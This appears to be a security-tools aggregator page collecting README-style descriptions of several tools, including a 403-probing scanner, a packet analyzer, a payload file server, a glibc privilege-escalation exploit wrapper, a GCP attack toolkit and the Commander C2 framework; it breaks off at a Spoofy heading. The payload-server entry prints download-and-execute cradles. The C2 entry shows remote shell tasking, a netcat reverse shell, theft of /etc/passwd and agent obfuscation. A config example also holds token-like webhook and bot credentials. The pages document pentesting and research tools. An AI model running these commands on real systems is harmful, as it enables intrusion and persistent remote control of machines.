WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does (a simplified sketch follows the list):

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.
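A condensed sketch of that request loop (not WebSecProbe's actual source; the payload and header lists here are small illustrative subsets):

# Sketch of the probing loop described above.
import requests

payloads = ["", "%2e/", "..;/", "/.", "//"]                 # URL variations
header_variants = [{}, {"X-Original-URL": "/admin-login"}]  # special headers

def probe(base_url, path):
    for payload in payloads:
        url = f"{base_url.rstrip('/')}/{payload}{path}"
        for headers in header_variants:
            resp = requests.get(url, headers=headers, timeout=10)
            print(url, resp.status_code, len(resp.content))

probe("https://example.com", "admin-login")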

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
    url = 'https://example.com'  # Replace with your target URL
    path = 'admin-login'  # Replace with your desired path

    probe = WebSecProbe(url, path)
    probe.run()



Aws-Waf-Header-Analyzer - The Purpose Of The Project Is To Create Rate Limit In AWS WaF Based On HTTP Headers

By: Zion3R


The purpose of the project is to create rate limit in AWS WaF based on HTTP headers.


Golang is a dependency needed to build the binary. See the documentation to install: https://go.dev/doc/install

make
sudo make install

The rules configuration is very simple: for example, the threshold is the limit of requests in a given time window. It's possible to monitor multiple headers, but each header needs to be present in the HTTP request header log.

rules:
  header:
    x-api-id: # The header name in HTTP Request header
      threshold: 100
  token:
    threshold: 1000

It's possible to send notifications to Slack and Telegram. To configure Slack notifications, you need to create a webhook; see the Slack documentation: https://api.slack.com/messaging/webhooks

Telegram bot father: https://t.me/botfather

notifications:
  slack:
    webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs
  telegram:
    bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
    chat-id: "-4128833322"

To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:

export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"

retrive-logs-minutes-ago is the time range for which you want to fetch the logs; in this example, logs from 1 hour ago.

aws:
  waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
  region: us-east-1
  retrive-logs-minutes-ago: 60


TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
Requirements:

  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.
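For a sense of what the protocol filter does internally, here is a minimal scapy sketch (an approximation, not trafficwatch.py itself) that reads a PCAP and prints a limited number of packets for one protocol:

# Sketch: read a PCAP and filter by protocol, as -f/-p/-c do.
from scapy.all import rdpcap
from scapy.layers.inet import ICMP, TCP, UDP

LAYERS = {"TCP": TCP, "UDP": UDP, "ICMP": ICMP}

def show(pcap_path, protocol=None, count=10):
    layer = LAYERS.get(protocol)
    shown = 0
    for pkt in rdpcap(pcap_path):
        if layer is not None and not pkt.haslayer(layer):
            continue
        print(pkt.time, pkt.summary())  # timestamp plus a one-line summary
        shown += 1
        if shown >= count:
            break

show("path/to/your.pcap", protocol="TCP", count=10)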

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about TrafficWatch, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!



Qu1Ckdr0P2 - Quicky Serve Files Over Http Or Https Using Flask

By: Zion3R


Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed to be used on exams like the OSCP and PNPT, or CTFs such as HTB.

Pull requests and issues welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use with the --https option; priority is given to the tun0 interface when the webserver is running, otherwise it will use eth0 (see the sketch below).
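That interface priority can be expressed in a few lines; the sketch below is an illustration using the netifaces package, not qu1ckdr0p2's actual code:

# Sketch: prefer tun0's IPv4 address when present, otherwise fall back to eth0.
import netifaces

def pick_ip(preferred=("tun0", "eth0")):
    for iface in preferred:
        if iface in netifaces.interfaces():
            addrs = netifaces.ifaddresses(iface).get(netifaces.AF_INET)
            if addrs:
                return addrs[0]["addr"]
    return "127.0.0.1"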

The common.ini defines the mapped aliases used within the --search and -u options.


When the webserver is running there are several download cradles printed to the screen to copy and paste.

pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc

or

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update

$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080

$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

Welcome to qu1ckdr0p2 entry point.

Options:
--debug Enable debug mode.
--help Show this message and exit.

Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]

Serve files.

Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help       
Usage: serv init [OPTIONS]

Perform updates.

Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self

The mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.

$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit

[→] URL: http://192.168.1.5:80/agent

[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

⠧ Web server running

MIT



PatchaPalooza - A Comprehensive Tool That Provides An Insightful Analysis Of Microsoft's Monthly Security Updates

By: Zion3R


A comprehensive tool that provides an insightful analysis of Microsoft's monthly security updates.

If you are interested in seeing all this data on a live website, visit:


PatchaPalooza uses the power of Microsoft's MSRC CVRF API to fetch, store, and analyze security update data. Designed for cybersecurity professionals, it offers a streamlined experience for those who require a quick yet detailed overview of vulnerabilities, their exploitation status, and more. This tool operates entirely offline once the data has been fetched, ensuring that your analyses can continue even without an internet connection.
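For context, fetching one month's data from the public MSRC CVRF v2.0 endpoint looks roughly like this (a sketch, not PatchaPalooza's source):

# Sketch: fetch one month of Microsoft security updates from the MSRC CVRF API.
import requests

def fetch_month(month):
    """month uses the YYYY-MMM format from --month, e.g. '2023-Oct'."""
    url = f"https://api.msrc.microsoft.com/cvrf/v2.0/cvrf/{month}"
    resp = requests.get(url, headers={"Accept": "application/json"}, timeout=30)
    resp.raise_for_status()
    return resp.json()

data = fetch_month("2023-Oct")
print(len(data.get("Vulnerability", [])), "vulnerabilities")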

  • Retrieve Data: Fetches the latest security update summaries directly from Microsoft.
  • Offline Storage: Stores the fetched data for offline analysis.
  • Detailed Analysis: Analyze specific months or get a comprehensive view across months.
  • CVE Details: Dive deep into specifics of a particular CVE.
  • Exploitation Overview: Quickly identify which vulnerabilities are currently being exploited.
  • CVSS Scoring: Prioritize your patching efforts based on CVSS scores.
  • Categorized Overview: Get a breakdown of vulnerabilities based on their types.

Run PatchaPalooza without arguments to see an analysis of the current month's data:

python PatchaPalooza.py

For a specific month's analysis:

python PatchaPalooza.py --month YYYY-MMM

To display a detailed view of a specific CVE:

python PatchaPalooza.py --detail CVE-ID

To update and store the latest data:

python PatchaPalooza.py --update

For an overall statistical overview:

python PatchaPalooza.py --stats

  • Python 3.x
  • Requests library
  • Termcolor library

This tool is built upon Microsoft's MSRC CVRF API and is inspired by the work of @KevTheHermit.

Alexander Hagenah

This tool is meant for educational and professional purposes only. No license, so do with it whatever you like.



LooneyPwner - Exploit Tool For CVE-2023-4911, Targeting The 'Looney Tunables' Glibc Vulnerability In Various Linux Distributions

By: Zion3R


Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.

LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.


The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.

Unauthorized root access provides attackers unrestricted authority, enabling them to:

  • Modify, delete, or steal sensitive data.
  • Install malicious software or backdoors.
  • Facilitate ongoing attacks that may remain undetected for extended periods.
  • Cause data breaches, accessing customer data, intellectual property, and financial records.
  • Disrupt critical system operations, potentially causing service outages and harming an organization's reputation.

LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool (see the sketch after this list):

  • Detects the installed glibc version.
  • Checks for vulnerability status.
  • Offers an option for exploitation if vulnerable.
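The first of those steps, glibc version detection, boils down to parsing the loader's version string. A minimal sketch follows; looneypwner.sh itself is a shell script, so this Python version is only illustrative:

# Sketch: detect the installed glibc version by parsing `ldd --version`.
import re
import subprocess

def glibc_version():
    out = subprocess.run(["ldd", "--version"], capture_output=True, text=True).stdout
    m = re.search(r"\d+\.\d+", out.splitlines()[0])
    return m.group(0) if m else "unknown"

print("Detected glibc:", glibc_version())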

chmod +x looneypwner.sh
./looneypwner.sh


This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.

This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more. 


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

This will install all the required modules and their respective versions.

Run the program using the following command:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url

Web Information Program

positional arguments:
url Enter the site URL

options:
-h, --help show this help message and exit

Replace <url> with the URL of the website you want to explore.

Here is an example output of running the program:

┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div>

Contributions are welcome! To contribute to PathFinder, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

  • Thank you my friend Varol

This project is licensed under the MIT License - see the LICENSE file for details.

For any inquiries or further information, you can reach me through the following channels:



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category | Primary Module | Command Group | Operation | Description
User Authentication | auth | - | activate | Activate a Specific Authentication Method
 | | - | add | Add a New Authentication Method
 | | - | delete | Remove a Specific Authentication Method
 | | - | list | List All Available Authentication Methods
Cloud Functions | functions | - | list | List All Deployed Cloud Functions
 | | - | permissions | Display Permissions for a Specific Cloud Function
 | | - | triggers | List All Triggers for a Specific Cloud Function
Cloud Storage | storage | buckets | list | List All Storage Buckets
 | | buckets | permissions | Display Permissions for Storage Buckets
Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation
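
As a concrete taste of that, here is a minimal Python sketch of querying the API; the route, port, and bearer-token header are illustrative placeholders, not documented SecuSphere endpoints, so consult the official REST API documentation for the real ones.

# hypothetical SecuSphere API query; the /api/vulnerabilities route and
# the bearer-token header are placeholder assumptions for illustration
import requests

BASE_URL = "http://localhost:8081"                  # assumes the Docker port mapping shown below
HEADERS = {"Authorization": "Bearer <your-token>"}  # placeholder credential

resp = requests.get(f"{BASE_URL}/api/vulnerabilities", headers=HEADERS)
resp.raise_for_status()
for vuln in resp.json():
    print(vuln)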

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required, along with the following dependencies.

Linux is required for admin.py and c2_server.py (untested on Windows):
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last, the agent. For the Python agent you can just run it, but the C agent needs to be compiled first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the agents and the server run over TLS and Base64. The communication point is set to 127.0.0.1:5000; if a different endpoint is needed, it should be changed in the agents' source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what I believe :P

The idea behind this functionality is that the c2 server can ask an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment, start admin.py first, then c2_server.py, and finally run the agent. After that you can check the available agents.

# show all available agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:
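# instruct all agents to execute the command "id"
task add all c2-shell id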

To check the history/previous results of executed tasks for a specific agent, do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks, for example to 30 seconds, like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your preferred agent
task add your_preferred_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, like with netcat or Metasploit, do the following.

# show all available agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that comes back up immediately even if you get disconnected. Only the interactive commands will make it die permanently.

Obfuscation

The Python agent offers obfuscation using basic AES-ECB encryption and Base64 encoding.

Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py
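
For reference, the core idea (AES-ECB over the agent source, then Base64) can be sketched in a few lines of Python. This is only an illustration using pycryptodome, not the actual obfuscator.py implementation:

# illustrative AES-ECB + Base64 obfuscation sketch (not the real obfuscator.py)
import base64
from Crypto.Cipher import AES          # pip install pycryptodome
from Crypto.Util.Padding import pad

KEY = b"0123456789abcdef"              # 16-character key, as required above

def obfuscate(source: str) -> str:
    cipher = AES.new(KEY, AES.MODE_ECB)
    encrypted = cipher.encrypt(pad(source.encode(), AES.block_size))
    return base64.b64encode(encrypted).decode()

print(obfuscate("print('agent payload')"))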

Tips & Tricks

  1. The built-in Flask app server can't handle multiple/concurrent requests, so you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
  2. Create a binary file for your Python agent like this:
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your Python and pip libs. If it continues failing then ...well... life happened.

  3. Create new certs for each engagement.

  4. Backup your c2.db, it is easy... just a file.

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R


JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Prerequisites

Before installing JSpector, you need to have Jython installed on Burp Suite.

Installation

  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to JSpector.py.
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

Usage

  • Just navigate through your targets and JSpector will start passively crawling JS files in the background, automatically returning the results on the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



